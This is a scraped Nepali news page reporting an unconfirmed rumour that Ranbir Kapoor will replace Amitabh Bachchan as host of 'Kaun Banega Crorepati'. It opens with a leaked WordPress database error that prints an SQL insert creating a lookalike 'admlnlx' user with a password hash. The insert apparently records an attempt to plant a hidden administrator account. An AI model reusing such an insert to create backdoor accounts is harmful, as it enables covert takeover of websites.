WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHct0cbMj1/MdZ4myONDo2pbiZg84L.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 06:54:26', '', 'admlnlx', 'admlnlx')
भारत,माघ ९ –
सन् २००० मा भारतीय टेलिभिजनमा प्रसारित भएको शो ‘कौन बनेगा करोडपति’ घरघरको रोजाइ बन्यो र यो कार्यक्रममा सहभागिता जनाउन सबै उत्सुक रहिरहे । सबैभन्दा बढी हेरिने यो शो ‘कौन बनेगा करोडपति’ केबीसीको नामबाट समेत लोकप्रिय भयो । यो शोको सबैभन्दा ठूलो कुरा यसका प्रस्तोता अमिताभ बच्चन थिए, जसको आवाजले कार्यक्रमको शोभा अझ बढाएको थियो ।
यो कार्यक्रमको प्रत्येक सिजनलाई प्रस्तुत गरिसकेका महानायक अमिताभ बच्चनलाई एकपटक शाहरुख खानले प्रतिस्थापन गरेका थिए । तर, पछि अमिताभ बच्चन नै यो कार्यक्रमलाई चलाइरहेको देखिए । अमिताभको ओजपूर्ण आवाजले केबीसीलाई सबैभन्दा धेरै हेरिने कार्यक्रम बनाइदियो ।
केबीसीका बारे पछिल्लो खबरले यसमा ठूलो परिवर्तन हुने बताइएको छ । बलिउड हंगामाले स्रोतलाई उद्धृत गर्दै जनाएअनुसार यो चर्चित कार्यक्रमको आगामी सिजनमा अमिताभ बच्चन देखिने छैनन् । खबरका अनुसार अमिताभ बच्चनको कुर्सीमा अरु कोही नभएर ‘चार्मिङ हेन्डसम’ रणवीर कपुर बस्नेछन् ।
यो हल्लाले बजार तताएको छ । रणवीर कपुरले केबीसीको आगामी सिजन होस्ट गर्न सक्नेछन् । यद्यपि यस बारेमा अहिले कुनै आधिकारिक पुष्टि भने भएको छैन ।